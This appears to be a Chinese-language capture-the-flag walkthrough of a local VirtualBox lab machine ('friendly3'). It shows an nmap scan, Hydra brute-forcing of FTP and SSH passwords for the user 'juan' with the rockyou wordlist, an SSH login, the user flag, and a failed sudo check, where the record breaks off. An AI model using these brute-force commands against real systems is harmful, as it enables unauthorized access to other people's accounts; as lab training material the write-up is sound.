┌──(root㉿kali)-[/home/ace] └─# nmap -sC -sV -p- 192.168.56.140 Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-1018:23 CST Nmap scan report for192.168.56.140 Host is up (0.00074s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0) | ssh-hostkey: | 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA) |_ 2567b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519) 80/tcp open http nginx 1.22.1 |_http-server-header: nginx/1.22.1 |_http-title: Welcome to nginx! MAC Address: 08:00:27:2D:A5:44 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
2.访问页面
image-20230810182607711
由此,存在两个账户
sysadmin和juan
试一试爆破
Powershell
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kali)-[/home/ace] └─# hydra -l juan -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.140 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-1018:28:23 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ftp://192.168.56.140:21/ [21][ftp] host: 192.168.56.140 login: juan password: alexis 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-1018:28:50
进入ftp看看
image-20230810183628636
3.进入系统
ftp鸟用没有。。。
进入ssh 爆破
Powershell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[/home/ace] └─# hydra -l juan -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.140 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-1018:37:52 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.56.140:22/ [22][ssh] host: 192.168.56.140 login: juan password: alexis 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete untilend. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-1018:39:01
┌──(root㉿kali)-[/home/ace] └─# ssh juan@192.168.56.140 The authenticity of host '192.168.56.140 (192.168.56.140)' can't be established. ED25519 key fingerprint is SHA256:qcoxC68+orQ8LIJrunR2ElUTnj9X5X0OFj9F/oxHDjc. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.140' (ED25519) to the list of known hosts. juan@192.168.56.140's password: Linux friendly3 6.1.0-9-amd64#1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Aug 1006:42:482023 juan@friendly3:~$ls ftp user.txt juan@friendly3:~$cat user.txt cb40b159c8086733d57280de3f97de30
success!!!
4.sudo提权
Powershell
1 2 3
juan@friendly3:~$ sudo -l -bash: sudo: command not found juan@friendly3:~$
image-20230810182607711
image-20230810183628636
v1.5.1